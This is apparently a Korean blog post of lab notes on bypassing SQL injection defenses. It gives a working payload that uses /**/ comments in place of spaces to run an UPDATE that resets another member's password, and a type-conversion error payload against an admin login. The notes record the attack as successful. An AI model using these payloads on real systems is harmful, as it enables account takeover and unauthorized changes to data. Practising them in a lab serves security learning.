yuil :: SecOps

[WebSec] SQL Injection 방어 우회 실습 본문

실습/Web Security 실습

[WebSec] SQL Injection 방어 우회 실습

yuil.lee 2025. 10. 21. 09:45
xp
# 공백을 /**/ 주석처리
anything';update/**/member/**/set/**/mem_pwd='hacked'/**/where/**/mem_id='dltnstls'--

pw : hacked
dltnstls / hacked
우회 성공

 

쿼리분석기에서도 정상적으로 실행되는 모습

 

형 변환 에러 공격에 주석 활용
admin'/**/and/**/mem_pwd=1--

 

반응형